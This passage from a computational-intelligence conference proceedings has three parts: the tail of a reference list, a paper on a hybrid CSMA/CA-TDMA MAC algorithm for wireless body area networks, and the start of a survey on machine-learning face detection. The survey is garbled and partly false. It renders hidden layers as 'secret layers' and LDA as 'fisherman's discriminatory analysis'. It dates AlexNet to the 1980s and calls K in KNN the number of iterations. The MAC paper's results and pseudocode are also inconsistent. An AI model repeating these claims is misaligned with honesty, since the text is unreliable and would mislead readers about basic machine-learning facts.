complexity measures for imbalanced classification tasks. In Proceedings international joint
conference on neural networks (IJCNN) (pp. 1–8). Rio de Janeiro. https://doi.org/10.1109/
IJCNN.2018.8489661
23. Brun, A. L., Britto, A. S., Jr., Oliveira, L. S., Enembreck, F., & Sabourin, R. (2018). A frame-
work for dynamic classifier selection oriented by the classification problem difficulty. Pattern
Recognition, 76, 175–190.
24. Xing, Y., Cai, H., Cai, Y., Hejlesen, O., & Toft, E. (2013) Preliminary evaluation of classifi-
cation complexity measures on imbalanced data. Proceedings Chinese intelligent automation
conference (pp. 189–196).
25. Yu, H., Ni, J., Xu, S., Qin, B., & Jv, H. (2014). Estimating harmfulness of class imbalance by
scatter matrix based class separability measure. Journal Intelligent Data Analysis, 18, 203–216.
26. Diez-Pastor, J. F., Rodriguez, J. J., Garcia-Osorio, C. I., & Kuncheva, L. I. (2015). Diversity
tech- niques improve the performance of the best imbalance learning ensembles. Information
Sciences, 325, 98–117.
27. Tomek, I. (1976). Two modifications of CNN. IEEE transactions on systems man and
communication SMC-6 (pp. 769–772).
28. Hart, P.E. (1968). The condensed nearest neighbour rule. IEEE transactions on information
theory IT-14 (pp. 515–516).
29. Kubat, M., & Matwin, S. (1997). Addressing the curse of imbalanced datasets: one sided
sampling. In Proceedings of 14th international conference on machine learning (pp. 179–186).
Nashville, TN.
30. Laurikkala, J. (2001). Improving identification of difficult small classes by balancing class
distribution. Technical Report A-2001-2, University of Tampere.
Enhanced Combined Multiplexing
Algorithm (ECMA) for Wireless Body
Area Network (WBAN)

Poonam Rani, Ankur Dumka, Rishika Yadav, and Vikas Yadav

Abstract A wireless body area network WBAN consists of a medical sensor


attached to or implanted in the body through a wireless medium. The physical infor-
mation of the human body can be collected using this technology. The coordinator
node collects information from sensor devices. A WBAN consists of sensors that
can collect body variables or body related data using wireless medium attached on or
implanted in the body through a wireless medium. The WBAN network consists of
coordinator nodes that collect information from the sensing device and transfer this
information to the healthcare monitoring system through access point (AP) located
nearby. One of the challenges in body area network is to maintain the quality of
service (QoS), e.g., throughput and delay, under the dynamic environment dictated by
human mobility. In this paper, we are improving the performance of MAC protocol in
congested wireless networks by combining carrier-sense multiple access with colli-
sion avoidance (CSMA/CA) with that of time-division multiple access (TDMA).
The system opt functionality to sends this information to the external monitoring
system (usually electronic healthcare system) through nearby access points (APs).
The challenge with the body area network is to track and maintain the QoS, e.g.,
throughput and delay, under the dynamic environment dictated by human mobility.
IN this paper, we are improving the performance of the MAC protocol in congested
wireless networks by combining CSMA/CA with that of TDMA.

P. Rani · R. Yadav (B)


Department of Computer Science and Engineering, Graphic Era Hill University, Dehradun,
Uttarakhand, India
P. Rani
e-mail: prani@gehu.ac.in
A. Dumka
Department of Computer Science and Engineering, Women Institute of Technology, Dehradun,
Uttarakhand, India
V. Yadav
Department of Computer Science and Engineering, ABES Engineering College Ghaziabad,
Ghaziabad, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 93
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_8
94 P. Rani et al.

Keywords Wireless body area network (WBAN) · Medium access control


(MAC) · Carrier-sense multiple\access with collision avoidance (CSMA/CA) ·
Time-division multiple access (TDMA)

1 Introduction

A WBAN consists of different wearable sensors, which are used to monitor the
vital signs of a human body and an on-body coordinator. The MAC protocol [1] in
a WBAN defines a set of rules which regulate the activities of sensing equipment
in the network. The sensing devices are responsible for transmitting and receiving
data packet sleeping and idling. In case if the MAC protocol is not designed prop-
erly, it results in the energy loss in wireless body area network devices because
of many conditions for, e.g., overhearing, collisions, over emitting, idling and on–
off transitions. In general, the MAC protocols are classified into two categories:
Contention-free and contention-based MAC protocols.
In a contention-free MAC protocol, time is broken up into frames and that further
divided into time slots. The value (time slot) is assigned to a device during packet
transmission. The device can transmit packets at their allotted time slot and no other
device contained to transmit during this time slot. This protocol is used to eliminate
the collision problem inherent in the CSMA protocol.
In a contention-based MAC protocol, the shared medium is provided to transfer
data to all sensor devices. The performance evaluation depends on channel access
probabilities of all sensor devices in the network.
We have proposed to blend the strength of two algorithms CSMA/CA and TDMA.
We apply TDMA scheduling on nodes of less priority and those are not trans-
mitting frames for a long period of time. We can TDMA schedule can put in
between the contention phase of the super frame. The remaining node will follow the
CSMA/CA mechanism. On the other hand, in the CSMA/CA method the channel
requires to perform carrier sensing operation to make sure that the channel is free
for transmission.

2 Related Works

The BAN broadly used in the applications in the healthcare field. Healthcare field is
very susceptible. Therefore, the MAC protocols proposed for a BAN require addi-
tional care. MAC protocols are proposed widely. It has been noted that the TDMA [2]
and CSMA mechanisms are the most well known in MAC protocols [3] for a BAN.
TDMA is ideal in earlier times, as it gives improved execution in unsaturated traffic
conditions. A node that can be put as a sink node at waist and sensors for glucose
level and ECG are placed close to the sink node. These nodes have significant data of
patients that are mandatory to preserve high trustworthiness as far as node failure and
Enhanced Combined Multiplexing Algorithm (ECMA) for Wireless … 95

longer lifetime. The sensors transmit the information taken from the environment to
sink via forwarded information. It preserves energy of nodes and network works for
longer periods. Based on the cost function, the individual node decides whether that
node become a forwarder node or not.

C.F(i) = d(i) ÷ R.E(i) (1)

A node with minimum cost function is preferred as a forwarder. The forward node
aggregates data and forward to sink. Forwarder node assigns a TDMA based time slot
to its descendant nodes. All the successor nodes transmit their data to the forwarder
node in its own scheduled time slot. Fang, G., and Dutkiewicz, E. [4] an energy
efficient MAC protocol (Body MAC) proposed by authors. It utilizes flexible band-
width allocation to enhance node energy effectiveness by dropping the probability of
packet collisions. Body MAC depends on the Downlink and Uplink method in which
the contention-free part in the Uplink subframe that is totally collision free. Liu, B.,
Yan, Z., and Chen, C. W. [5] proposed a context-aware MAC protocol using a hybrid
of contention based and TDMA multi access method to deal with loss channels by
adaptively modifying MAC frame structure. Schedule-based and polling-based tech-
niques are also utilized to manage periodic, emergency traffic prerequisite. Reference
[6, 7] the paper proposed TDMA-based MAC protocol design. 24 nodes are taken
for Simulations. This technique tries to enhance energy utilization with a TDMA
scheme. In the unscheduled wake up process, all the nodes in the network have an
autonomous wake up plan. Since they do not know the clue about the wake up plan
of other devices, carrier sensing (CS) is utilized to avoid collisions.
Enhanced MAC protocol [8] was proposed to enhance the lifetime where end-to-
end delay transmission is focused. To improve the lifetime, author analyze different
model. Also, author has implemented cross-layer collaboration between the node so
that lifetime can be improved.
Author [9] proposed work in which five parts of energy consumption was divided
into different task. In this paper, task was prepared to provide framework, in which
is based on observed request every node take decision for the next. The proposed
work divides these tasks into five energy consuming parts. Efficiency of application
and consumption of energy can be interchanged with reference to reward function
thereby in term of performance result can be improved. Further performance can
also be improved by interchanging the data among neighboring nodes.

3 Proposed Model

The protocols in MAC a WBAN limits some protocol which controls the conduct
of sensor gadgets in the network. Transmitting information packet, receiving infor-
mation packet, idleness, or sleeping are the main activities of a sensor device. If
the Mac protocol is not designed well then it can achieve the wastage of energy
for, e.g., collisions, overhearing, idling, over emitting and on–off transitions. Quality
96 P. Rani et al.

Fig. 1 Beacon period access phases

of service attribute is vital for high-quality Mac protocol in WBAN. Since the vast
amount of energy is required to transmit data over wireless medium, communication
requirement is fulfilled by MAC protocol therefore it is important to implement it for
the network. Poor throughput and energy wastefulness, characteristics of CSMA/CA
make it less suitable for WBAN. On the other hand, the advantage of TDMA is that it
is collision free as its slots are fixed but its main drawback is that it suffers from one
major problem, i.e., scalability. That is the reason we have combined the property of
both CSMA/CA and TDMA to improve the MAC protocol performance. That is the
reason in super frame, the schedule of TDMA will be placed in between the contention
phase for the nodes which have been idle for the longest time. On the other hand,
CSMA/CA protocols will be followed by remaining nodes. To identify the node to
be accessed by which channel, i.e., CSMA/CA or TDMA is decided by our proposed
algorithm and quality of service will further be increased by this algorithm. Beacon
will be sent by coordinator in every beacon period or super frame. In contended allo-
cations communication will be started by nodes with the following sequence EAP1,
RAP1 up to n number of EAP and up to n number of RAP, respectively (Fig. 1).

4 Proposed Transmission Scheme Algorithm

Let n denote the number of sensor nodes, delay is di of every node where i denotes i
= 1–n. Average delay will be calculated in the first round. Average delay of the same
node will be calculated in the second round. The procedure will continue when the
node’s delay is not converged. The procedure will continue for a given number of
nodes.
Same priority nodes will be grouped, and then similar priority nodes average delay
will be calculated. After that compare average delay di of every node and average
delay di of similar priority grouped node. If each node’s average delay is less than
or equal to similar priority grouped nodes average delay, then allocate CSMA/CA to
those nodes. If each node’s average delay is larger than or equal to similar priority
grouped nodes average delay, then allocate TDMA to those nodes.
Enhanced Combined Multiplexing Algorithm (ECMA) for Wireless … 97

Algorithm 1 Proposed Algorithm


1. procedure CAP
CFP (a = number of sensor node, k = number of rounds,0≤ β≤1)
2. s=0;
3. c=0;
4. for i = 1 to a do
5. For j=1 to k do
6. delaynew+1=β*delay_old + (1-β) *delay_new
7. end for
8. av_delay_nod[i] = delay_new+1.
9. i =i + 1
10. end for
11. for hp = 1 to 7 do
12. for i = 1 to c do
13. if node[i]. priority == hp
14. Then s=s+av_delay_nod[i]
15. c= c + 1;
16. end if
17. ag _wait_tim [hp] = s/c
18. end for
19. for i = 1 to a do
20. if nod[i]. priority == hp then
21. if ag _wait_tim[hp]<= av_ delay nod[i] then
22. Allocate TDMA
23. end if
24. if ag_wait_tim[hp]> av_ delay_nod[i] then
25. Allocate CSMA/CA
26. end if
27. end if
28. end for
29. end for
30. end procedure

5 Proposed Transmission Scheme Flowchart

GTS, i.e., guaranteed time slots will be placed on the beacon frame at the starting of
every super frame by coordinator. If each node’s average delay is less than or equal
to similar priority grouped nodes average delay, then allocate CSMA/CA to those
nodes. If each node’s average delay is larger than or equal to similar priority grouped
nodes average delay, then allocate TDMA to those nodes else CSMA/CA is used
during CAP for transmitting the data.
Duration of CAP will remain idle when GTS slots have been assigned to the node
and in the CFP period data packet will be sent or else in CAP period transmission
will be put off. After transmission, during the assigned GTS slot, nodes will wait
for successive beacon frames. Sensor devices or nodes will remain in the idle state
98 P. Rani et al.

after dispatching the packet in CAP if extra packets are not in the buffer to send else
CSMA/CA will be started again. For transmission of packets if CAP length is not
sufficient or for a given super frame CAP length is ended then transmission of nodes
will be put off. The detailed method is shown in Fig. 2, i.e., how CSMA and TDMA
will work further once a node has been assigned the channel access mechanism.

Fig. 2 Proposed transmission scheme flowchart


Enhanced Combined Multiplexing Algorithm (ECMA) for Wireless … 99

6 Experiments and Results

In this section by using IEEE 802.15.6 standard [10] parameters and condition, the
performance of the CSMA/CA mechanism and our proposed model will be analyzed.
To enhance the quality of service in wireless body area networks is the main goal of
this paper so that the amount of energy consumed by WBAN is minimized. TDMA
and CSMA/CA to be assigned to which sensor node is being decided by our proposed
model which will further increase the performance of WBAN. MATLAB simulation
is used for generating the results.
To get the average delay, we simulate our algorithm 30 times for 10 nodes as shown
in Fig. 3. As shown in the result that for our proposed model delay gets minimized
for some number of nodes only, while for the rest of other nodes delay gets increased.
As we run the simulator, allotment of slots of CSMA/CA and TDMA to nodes will
get different each time. To get the average delay we simulate our algorithm 30 times
for 20 nodes as shown in Fig. 4. As shown in the result that for our proposed model
delay gets minimized for some number of nodes only while for the rest of other nodes
delay gets increased. CSMA will be allocated to node as shown in Fig. 3, i.e., 2, 3, 4,
6, 7, 8, 10, 14, 15, 17, 19, 20 as their delay of proposed model is larger than CSMA
delay. In contrast, TDMA will be allocated to node as shown in Fig. 3, i.e., 5, 9, 11,
12, 13, 16, 18 that is the delay of proposed model is less than CSMA delay. On the
other hand, this is not a major problem as in practical application of WBAN, there

Fig. 3 Average delay of node for n = 10 again


100 P. Rani et al.

Fig. 4 Average delay of node for n = 20

are a small number of sensor nodes which are placed on the body so the number of
devices that are mounted on body are relatively very small.

7 Conclusion

In this paper, we have studied different multiple access techniques of MAC protocols
that are exploited in wireless body area networks. MATLAB simulation is used for
comparing CSMA/CA and our proposed model.
Number of nodes is compared with average delay. Analysis of CSMA/CA and
proposed models will be measured using MATLAB simulation.
Increased number of devices does not affect the average delay. Results of simu-
lation shows that number of sensor nodes if we increase does not have greater effect
on it. However, this is not a major problem as in practical application of WBAN,
and there are a small number of sensor nodes which are placed on the body so the
number of devices that are mounted on the body are relatively very small.

References

1. Mahapatro, J., Misra, S., Manjunatha, M., & Islam, N., (2012, Dec). Interference-aware channel
switching for use in WBAN with human-sensor interface. In 2012 4th International Conference
on Intelligent Human Computer Interaction (IHCI) (pp. 1–5). IEEE.
2. Toumanari, A., & Latif, R. (2014, April). Performance analysis of IEEE 802.15. 6 and IEEE
802.15. 4 for wireless body sensor networks. In 2014 International Conference on Multimedia
Computing and Systems (ICMCS) (pp. 910–915). IEEE.
3. Latr, B., Braem, B., Moerman, I., Blondia, C., & De- meester, P. (2011). A survey on wireless
body area networks.Wireless Networks, 17(1), 1–18.
Enhanced Combined Multiplexing Algorithm (ECMA) for Wireless … 101

4. Fang, G., & Dutkiewicz, E. (2009, Sept). Body- MAC:Interference mitigation between WBAN
equipped patients. In ISCIT 2009 9th International Symposium on Communications and
Information Technology, 2009 (pp. 1455–1459). IEEE.
5. Liu, B., Yan, Z., & Chen, C. W. (2011, June). CA- MAC: A hybrid context-aware MAC
protocol for wireless body area networks. In 2011 13th IEEE International Conference on
e-Health Networking Applications and Services (Healthcom) (pp. 213–216). IEEE.
6. Shrestha, B., Hossain, E., & Choi, K. W. (2014). Dis- tributed and centralized hybrid
CSMA/CA-TDMA schemes for single-hop wireless networks. IEEE Transactions on Wireless
Communications, 13(7), 4050–4065.
7. Fang, G., & Dutkiewicz, E. (2009, Sept). Body- MAC: Energy efficient TDMA-based MAC
protocol for wireless body area networks. In ISCIT 2009 9th International Symposium on
Communications and Information Technology, 2009 (pp. 1455–1459). IEEE.
8. Alrabea, A., Alzubi, O., Alzubi, J. (2020). An enhanced Mac protocol design prolong sensor
network lifetime. International Journal on Communication Antenna Propagation 10. https://
doi.org/10.15866/irecap.v10i1.17467
9. Alrabea, A., Alzubi, O. A., Alzubi, J. A. (2019). A task-based model for minimizing energy
consumption in WSNs. Energy System 1–18.
10. Bhatia, A., Patro, R. K. (2014). Emergency handling in MICS based body area network. In 2014
IEEE International Conference on Electronics, Computing and Communication Technologies
(CONECCT) pp 1–5.
A Survey: Approaches to Facial
Detection and Recognition with Machine
Learning Techniques

Prateek Singhal, Prabhat Kumar Srivastava, Arvind Kumar Tiwari,


and Ratnesh Kumar Shukla

Abstract The present scenario in biometrics is very complex and challenging to


classify the facial recognition and authentication. This article described a detailed
review on machine learning. Author describes different databases and multiple
approaches to overcome the issue of face identification and recognition. This paper
offers a description of the work of numerous researchers on the recognition of faces
and identity. It focuses on the facial recognition and recognition method in which
minimal and unregulated faces processed for individual photographs, and videos are
recognized and authenticated. Author describes several facial files, real-time pictures,
and videos to discuss sophisticated approaches for their identification and recognition
applications. The introduction of a machine learning approach with multiple image
datasets also increases the efficiency of the classifier in order to predict face detec-
tion and recognition-related content. In conclusion, author elaborated the various
approaches of machine learning and deep learning related to facial recognition and
identification.

Keywords Facial control panel · Machine learning techniques · Deep learning


techniques · Biometric computer

1 Introduction

In the present situation, object identification and recognition are a very complex
and daunting topic in pattern processing, computer vision, neural networks, and
machine learning. This subject is being debated in numerous learning communities,

P. Singhal (B) · P. K. Srivastava


Babu Banarasi Das University, Lucknow, U.P, India
A. K. Tiwari
Kamal Nehru Institute of Technology, Sultanpur, U.P, India
e-mail: arvind@kiit.ac.in
R. K. Shukla
Dr. APJ Abdul Kalam Technical University, Lucknow, U.P, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 103
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_9
104 P. Singhal et al.

such as the controller community and the unregulated world. Facial implementations
involve the recognition of 2D facial representations and the creation of different facial
descriptors using various learning strategies. A new method for researchers in the
area of artificial intelligence in face detection and recognition has been found in
recent advances of deep learning. It is a finding of objective objectives, and a rapidly
growing technique to be used for face detection and recognition is very popular. It
has been designed to address the dynamic problem of machine learning. It worked
on a human and machine-based problem. Deep learning is an innovative theory
and a technique-based method for identifying faces for recognition and verification.
In deep learning, the machine wants to be a learner and executes the process of
classification directly to the next video and pictures. It solves the state-of-the-art
dilemma and improves the accuracy and efficiency of human beings. Deep learning
has bounded and educated named data in neural network architecture. This involves
several layer numbers in the neural convolution network. Hidden layer served as a
bridge between input and output layers. They are working on a basic and complicated
type of pictures. Identification and authentication problems are solved by using the
full number of layers contained in the secret layer. The first introduction of deep
learning and theory is produced in 1980s. The following reasons they become a
powerful concept for feature extraction using in face detection and recognition.

1.1 Convolutional Neural Network

It has the best machine learning principles. They have been used in pattern recog-
nition, computer vision, and machine learning. Convolution neural network is the
best method for evaluating past information or evidence to solve a possible problem.
It relies on the transformation of the input image to translate to the output image
using several hidden layers. It is correlated with machine learning and pattern anal-
ysis. In 1980, Kanihiko Fukushima suggested the use of neural network archi-
tecture to address the image recognition problem. Study has been performed on
geometric patterns used in image processing for facial identification and recognition.
Researchers are focused on the issue of image and video recognition and authentica-
tion. They have a lot of ideas to solve the issue of facial identification and recognition.
In a deep learning approach, the term deep refers to the idea of the amount of hidden
layers found in max pooling networks. Generally, there are two or three layers, but
deep networks examine hundreds of layers. Though deep learning is focusing on
facial identification and recognition, higher accuracy has been achieved. They will
help us make sense of their aspirations. Deep learning is operating like a robot, and
it requires artificial intelligence. They will learn their functionality with the aid of a
function extract in which the functionality is derived from hidden layers.
Figure 1 demonstrates the neural convolution network architecture based on the
interaction between input, output, and hidden layers. Neural network architecture
helps organize a collection of interconnected nodes in the layers of redundancy.
What layers are known as hidden layers? The characteristics of the input images
A Survey: Approaches to Facial Detection and Recognition … 105

Fig. 1 Architecture of CNN from relationship between i/p, o/p, and hidden

are classified and compared to the storage images. Secret layer holds the highest
number of layers for apps. They identified different-different attributes in a basic and
complex picture in datasets. Figure 1 represents the model architecture of the neural
convolution network to be used in the mixture of the input, secret, and output layers.
These layers are the most important component of the neural convolution network,
since they interpret all the features of the input images and label them in hidden
layers according to their characteristics. Organize the output of the input images.

2 Machine Learning Methods in Face Detection


and Recognition Algorithms

It has been used for a significant number of classified data in datasets. This is the
corresponding sequence of features that are specifically involved in datasets and that
are used without manual field extractions. A deep neural network is a mixture of
nonlinear computation layers used in machine learning and pattern analysis. They
are interconnected with several layers such as the input layer for input data, the
secret layer for functions, and the output layer for an object. Deep learning addresses
the issue of faces in real-time photographs and databases. They started focused on
capturing photos, and they are normalizing the networks. Deep learning is focusing on
the widest technologies and ranging to enhance the efficiency of facial identification
and recognition. It solves the associated problems of the faces using convolutions
neural network architectures. Deep learning has the newest idea and definition to
develop face-related problems in a real-time world.
106 P. Singhal et al.

2.1 Alex Net

Alex Net is the first deep learning system developed in the 1980s by Geoffery Hinton
and his colleagues. It is a very popular and simple model for researchers to solve the
problem of face detection and recognition. It has a simple architecture to merge the
convolutionary layer with the total pooling layers. There is a mix of a convolutionary
layer, multiple pooling and a totally linked layer in a deep neural network. They
gathered a lot of information from the data and stored it in a convolution network,
including various types of hidden layers. So they’re divisions of the input object. The
deep neural network in Fig. 2 collects an input image and defines an entity or groups
an entity. They are classified as an entity that has productive outputs.
In Fig. 2, the input image used the test images in this network model, after gath-
ering the training data, the network model starts to recognize the basic features of
the object and is correlated with this image in the corresponding categories.
In this deep neural convolution, each layer incorporates data or image from the
previous layers and transfers it to the next layers. This model increases the precision
and consistency of all image data from layer to layer. Deep convolution of the neural
network is operating in various layers. The convolution layer holds the input image
from a neural transform network sequence. This forward translation understands
the characteristics of the pictures. Pooling layer simplifies performance by doing a
nonlinear reduction, down by averaging the number of measurements to be used for
the features of the images.
The fully connected layer plays a part in the identification of the object. After
completing the detection function of the deep convolution network, they would go to
the next layer called the fully linked node. It has the last and least significant layers
in the deep convolution neural network to classify and define the categories of the
entity. It includes a k-dimensional vector, where k is defined as a number of functions.
This model forecasts the characteristics of the network. These vectors include the
probabilities of each layer and class to be identified in each image.

Fig. 2 Deep CNN


A Survey: Approaches to Facial Detection and Recognition … 107

2.2 Feed Forward Neural Network

It has the most common deep learning algorithm. It is going to work on the role of
the faces of machine learning. It succeeded to define the characteristics of the input
layers. They do not use a manual extraction feature. They require a time tranfer the
information. The features of the databases have been solved and categorized. Figure 3
displays the architecture of the forward feed model network containing both weight
and bias elements. They often contain a three-layer structure, since several neural
networks have been allocated. The hidden layers shown in Fig. 3 are identified in
this model h. They conducted voi (output layer), h has hidden layer and voi as bias
layers. Bias has been applied to the network model as weights. The amount is always
1. They demonstrate the sum of output layers converting the data. Three layers are
found in Fig. 3 of the feed forward network architecture. The correspondence between
layer collections is proving to be a successful outcome. The input layers × 1–xn are
connected to the hidden layer h1–hn layers. They were connected to the output layers
y1–yn and interacted and interconnected with weight and bias in the network model.
They are going in the opposite direction. Computational sophistication depends on
the number of layers hidden. They achieve high fidelity in network models. The bias
is more efficient when dealing with input and output layers.

Fig. 3 Architecture of feed forward network with weight and bias


108 P. Singhal et al.

2.3 Deep Convolution Neural Network

It transmitted a nonlinear model using a limited number of layers. It has worked the
faces and understands the application of machine learning. This network has dele-
gated several hidden layers to different face features used. These layers are dealing
with neurons or nodes. DCNN interpreted the set of objects and, after processing,
immediately identified the face of the object to the corresponding input images. The
data named function in DCNN has training data in datasets. It has been used to recog-
nize images and to place these attributes in specific groups of datasets. DCNN has
moved the previous data to the set of functionality in the next layers of the architec-
ture. DCNN increases the consistency and precision of the piece. They are working
on a trend in DCNN from layer to layer.

2.4 K-nearest Neighbors

KNN algorithm is one of the better algorithms for adding the closest neighbor or
node functions. They are always also known as slow algorithms. K is the number of
iterations. This algorithm is easy to understand and interact with each other. K-closest
neighbor algorithm is based on the closest entity features node. But it performed as
a non-parametric algorithm. The word non-parametric does not require any claims
about the underlying distribution of data. They used the true word storage method.
Full functional data does not come within the traditional theoretical study of the
function learning mechanism. KNN algorithm chooses the closest function space in
the database. These features depend on the minimum distance or, perhaps, multi-
dimensional vectors. Since the space point function is a notion of distance. The
non-parametric algorithm, like the K-nearest neighbor algorithm, arrives to solve
this problem in the databases.

2.5 Support Vector Machine

It has a very efficient and effective classifier that is used in machine learning. In
support vector machine classifiers, the distinction between point and decision surface
of face detection and recognition must be maximized. It has the nearest decision
surface and points after choosing points on the decision surface and then generates
a distance from the decision surface. The closest point is known as the support
vector point. The use of these support vectors in the machine is called support vector
functions. It maximizes the margin of width and distance of the nearest points and
compares its characteristics from one point to another. Once this process has been
completed, the faces in the databases are remembered.
A Survey: Approaches to Facial Detection and Recognition … 109

2.6 Principal Component Analysis

It has a very common and oldest technique for image processing and pattern analysis.
This was developed by Pearson (1901) and improved by Hotlling (1933). It worked
on the Eigen value and the Eigen vectors using the matrix method. It has used
various applications for different varieties. The definition of PCA needs to reduce
the dimensionality of the databases. It is capable of a huge range of datasets. The
capabilities are linked to the remaining available databases in the scheme.

2.7 Linear Discriminant Analysis

This approach is similar to a fisherman’s discriminatory analysis. It has been used to


identify images, including local features. These features function in the shape of a
pixel value. They are classified as identified shape features, texture features, and color
features. It defines the functionality to be used for the linear vector separation. And
they also used a similar feature in the pic. These methods have been used to optimize
both class scatter and intra-class variation in face identification and recognition.

3 Feature Extraction

It has a very common method to be used to remove features from images for
facial identification and recognition. It has been commonly used in a number of
methods, such as optical image recognition, pattern detection, machine vision, and
deep learning. The input materials or pictures have been converted into pixels. This
pixel worth has turned a mix of features into a database since the chosen features
provide the most relevant details in the original data. It is also useful for biometric
applications and machine learning.

3.1 Geometric-Based Methods in Feature Extraction

Geometric feature-based methods are used to measure a series of images, such as


the lips, eyes, ears, and nose. In this geometric representation, the location of the
eyes, the mouth, the ear, and the nose is a type of characteristic vectors. They are
reliable for the detection of automated extraction and are critical for the detection
and recognition of the face. Geometric features reflect the shape, position, and color
of facial components that isolate a feature attribute for facial detection and facial
recognition.
110 P. Singhal et al.

3.2 Holistic-Based Methods in Feature Extraction

It has the most effective tool for facial identification and recognition. They use
software classification approaches based on facial identification and recognition.
Holistic feature extraction used by any local extraction process is a source of data
information which eliminates the usual processing that defines broad data from
images in the database. Holistic-based feature extraction transforms the image into a
low-dimensional feature space that increases the discriminant capacity of the images.

4 Related Work of Machine Learning Approaches in Face


Detection and Recognition

Machine learning methods have been suggested in a literature review performed by


different scholars. They also identified and accepted many methods and strategies
for the identification of ears.

5 Summary Sheet of Machine Learning Approaches


for Face Detection and Face Recognition

Table 1 provides the overview of machine learning facial detection and identification
in images in the videos. Table 1 also shows the facial identification and recognition
approaches using different strategies and datasets with accuracy. Table 1 further
illustrates the benefits and demerits of the approach by using various authors using
their own image definitions for datasets that have been shown to be related. The table
shows various strategies and approaches—distinct. Various scientists have used them
to have the best facial identification and recognition results. Also the methods used in
facial detection and identification are classified. The table description provides a full
overview of the approaches that classify the problems of faces in various settings.
They are attempting to solve the new face detection and identification issue found in
the existing scenario (Table 2).

6 Machine Learning Methods Perception and Suggestion


in Face Detection and Recognition

Face detection and recognition applications are using on 2D dimensional face images.
They need large number of feature matching in different techniques. Using learning
applications, they have improved the accuracy of face images in datasets. The impact
factor of pose, illumination, and expression is the basic and complete information
A Survey: Approaches to Facial Detection and Recognition … 111

Table 1 Brief description of literature


Year Description
2018 Ming Shao et.al. Sparse many-to-one encoder (SMF) and collective random faces (RFs).
They focused on presenting the invariant representation of the face and identifying the
faces. Author works on separate paper using MultiPIE pose datasets, You Tube datasets
(YTF), and real-world datasets. They increased efficiency from 7 to 14% in face detection
and recognition [1]
Chung-Chi Tsai et.al. introduced an unsupervised learning system and a general
optimization method. This procedure enhances the co-segmentation mask to enhance the
co-salience characteristics. Unsupervised learning and collaborative optimization method
examines the principle of objectivity and saliency in various types of multiple images or
datasets Cosal2015, iCoseg, image pair, and MSRC datasets have high-quality outcomes
for both co-salinity and co-segmentation [2]
Zhe Hu et.al. proposed a method of non-blind deconvolution to eliminate ringing
artefacts through light for facial detection and recognition. The non-blind deconvolution
process senses light stretches for distorted images and integrates them into the optimized
facial identification and recognition framework. The author has focused on png and jpeg
images using a low-light environment [3]
Saeed Anwar et.al. suggested the treatment of class-related problems and class genetic
blind deconvolution. This proposed method has been used to overcome the limitation of
the existing method when faced with blurred image that lacks a high frequency. This
focuses mainly on blurred images representing a single object and class-specific testing
using CMU-PIE, CAR, FTHZ and INRIA datasets [4]
Xiang Wanget.ai. proposed to use RegionNET or RexNet and salient object detection
techniques to solve the problem of facial detection and recognition. RexNet has provided
saliency mapping for VGG, ImageNet, ContexNet, ECSSD, DOTOMRON, and
RGBD1000 datasets from end to end. RexNet has focused on the identification and
multi-scale computational robustness strategy for facial detection and recognition [5]
Weihong Deng et.al. (2018) suggested a binarization filtering model and a spatial
histogram for facial detection and recognition. The author has created a scatter
compressive binary pattern (SCBP) descriptor to enhance the accuracy of the face picture.
SCBP uses 6RF own handcraft philtres to achieve accurate and robust performance. CBP
is also used to increase the robustness of LBP. In this article, the authors used DFD and
CBFD for derived noise sensitive filtering adapted to the fine grained structure of the
FERET, LPW, and PASCAL databases for face detection and recognition [6]
Koteswar Rao et.al. (2018) co-saliency prediction techniques have been used in various
facial identification and recognition datasets. Co-saliency estimation method using basic
scale estimation technique as shown on large-scale ImageNet, MSRC, iCoseg, and
Coseg-Rep datasets. This method solves a map dilemma with a well-separated
background and foreground. This system is capable of delivering very successful results
[7]
Sergey Tulyakov et.al. (2018) suggested a forest regression algorithm to diagnose the
problem of facial identification and recognition. They also solved the problem in a
coherent and effective way. They are stable in 3D face rotation of MultiPIE, HBPD,
BU-4DFE, and MultiPIE-VC datasets. This methods are used to find accurate calculation
of face position and accuracy of perspectives on various dimensions. This approach
achieves highly competitive results on a variety of benchmarks [8]
(continued)
112 P. Singhal et al.

Table 1 (continued)
Year Description
Xuanyi Dong et.al. (2018) suggested multi-model and self-paced learning algorithms for
detection (MSPLD) and few example object detection (FEOD) for face detection and
recognition. These models have used a large number of unidentified picture pools and a
few named images per group. They use various detection frameworks for discriminant
information. This approach provides stronger performance in PASCAL-VOC2007,
PASCAL-VOC2012, MSCOCO2014, ILSURC2013, and ImageNet-COCO datasets [9]
Mehdi Mafi et.al. (2018) introduced a switching-based adaptive median and fixed-based
weighted mean filter (SAMFWMF) for facial detection and recognition. Same edge
detection and sharpening have been regulated by SAMFWMF in Lena (5,128,512),
Cameraman (250 × 250), Coins (300 × 246), and Checkboard (256 × 256) pictures.
SAMFWMF achieves better systemic metrics. They are best resolved by entering into a
contract with another traditional thresholding tool to detect faces and then identify them
[10]
Dapeng Tao et al. (2018) suggested a model of the tensor rank preservation discriminant
analysis (TRPDA) technique to solve the issue of facial identification and recognition.
They achieved robust results and generated high rates in UMIST, ORL, and
CAS-PEAL-R1 datasets. TRPDA has extracted the knowledge rating and exclusion
function. They are a flexible way of studying the face for identification and recognition
[11]
Wei Wang et.ai. (2018) introduced chronic facial aging (RFA) and RNN for facial
diagnosis and identification. RFA improved 65.43% and the accuracy of the bilayer
increased 61%. It indicates that RFA performs marginally better than the RNN bilayer.
The author uses LFW and CACD datasets to enhance face detection and recognition
performance. RFA system consists of triple layer GRU, providing improved output of
identity information in the GRU bilayer for facial detection and recognition [12]
Seunghwa Jeong et.al. (2018) Markov has used random field energy modeling. In
specific, this approach functions as a large baseline multi-view system. This segmentation
approach increased efficiency with a comparable consistency. This has been created in the
latest state-of-the-art design. They also collected functionality in different critical
conditions. They provided the full number of rotations, views, and distances between the
cameras captured. A sparsely defined baseline has been collected quite efficiently [13]
Christos Sagonas et.al. (2018) suggested joint and human variation clarified (JIVF) and
robust-JIVE (RJPVE) for facial identification and recognition. They have increased the
quality of the ears. Details on the faces remaining in the RJIVE-based progression of
FG-NET datasets were also defined. Accuracy depends on the pair of photographs
compared to the age difference [14]
